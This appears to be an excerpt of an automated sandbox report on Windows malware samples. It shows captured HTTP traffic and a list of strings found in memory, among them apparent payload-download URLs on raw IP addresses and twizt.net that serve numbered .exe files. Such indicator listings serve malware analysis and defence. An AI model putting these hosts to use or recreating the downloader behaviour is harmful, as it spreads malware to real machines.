    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:57:39 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:57:42 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:57:44 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:57:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: 230053364.exe, 00000001.00000000.1355937745.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 230053364.exe, 00000001.00000002.1387027346.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 230053364.exe, 00000001.00000003.1376701923.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000000.1376669342.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000002.00000002.3804337373.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000007.00000000.1492018012.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000007.00000002.1513636166.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe.1.dr, 230053364.exe.0.dr, newtpp[1].exe.0.drString found in binary or memory: http://45.93.20.18/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/1
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000061D000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/2
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/2M/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/2f
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3/4o
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3/4t
    Source: sysludpvs.exe, 00000002.00000002.3804997354.00000000021AB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3/5
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/35I
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/39
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3E/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3W
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3a/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/4
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/4O
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000059E000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/5
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/5o
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001064000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000007.00000000.1492018012.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000007.00000002.1513636166.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe.1.dr, 230053364.exe.0.dr, newtpp[1].exe.0.drString found in binary or memory: http://91.202.233.141/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445201251.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445675085.00000000005FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1%
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1.exe
    Source: sysludpvs.exe, 00000002.00000002.3805028171.00000000021D3000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2127597845.00000000007B2000.00000002.00000001.01000000.00000008.sdmp, 152942395.exe, 00000005.00000000.1479470136.00000000007B2000.00000002.00000001.01000000.00000008.sdmp, 152942395.exe.2.drString found in binary or memory: http://91.202.233.141/1.exehttp://91.202.233.141/2.exehttp://91.202.233.141/3.exehttp://91.202.233.1
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1.exei/
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exe8-
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exe_-
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exedb
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exeg-
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/10.exey-
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/11.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/11.exeR
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/11.exex
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001072000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exe6
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exeL
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exeR
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exehn
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exehqos.dll.mui
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/12.exeq
    Source: sysludpvs.exe, 00000002.00000003.1445201251.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445675085.00000000005FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1C:
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2.233.141/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2.exe0
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2a
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000061D000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3.exe9/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3.exeA/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4.exeswsock.dll.mui
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5
    Source: 152942395.exeString found in binary or memory: http://91.202.233.141/5.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5.exe)/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5.exeI/
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6.exeQ/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6.exeT
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/7.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/7.exe233.141/3.exeshqos.dll.muid
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/7.exeq/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/7.exeshqos.dll.mui
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/7.exey/
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/8.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/8.exe1.
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/9.exe
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/9.exer
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/?k
    Source: 230053364.exe, 00000001.00000000.1355937745.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 230053364.exe, 00000001.00000002.1387027346.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 230053364.exe, 00000001.00000003.1376701923.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000000.1376669342.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000002.00000002.3804337373.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000007.00000000.1492018012.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000007.00000002.1513636166.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe.1.dr, 230053364.exe.0.dr, newtpp[1].exe.0.drString found in binary or memory: http://91.202.233.141/http://45.93.20.18/12345%s%s%s:Zone.Identifier%USERPROFILE%%windir%%s
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/v
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ws
    Source: newtpp[1].exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: newtpp[1].exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: a0RkmvhSaf.exe, a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exe
    Source: a0RkmvhSaf.exeString found in binary or memory: http://twizt.net/newtpp.exeP0
    Source: a0RkmvhSaf.exeString found in binary or memory: http://twizt.net/peinstall.php
    Source: a0RkmvhSaf.exeString found in binary or memory: http://twizt.net/peinstall.php%temp%%s
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.php6qcJ#
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpIr
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpXr
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpq
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpshqos.dll.mui
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpystem32
    Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
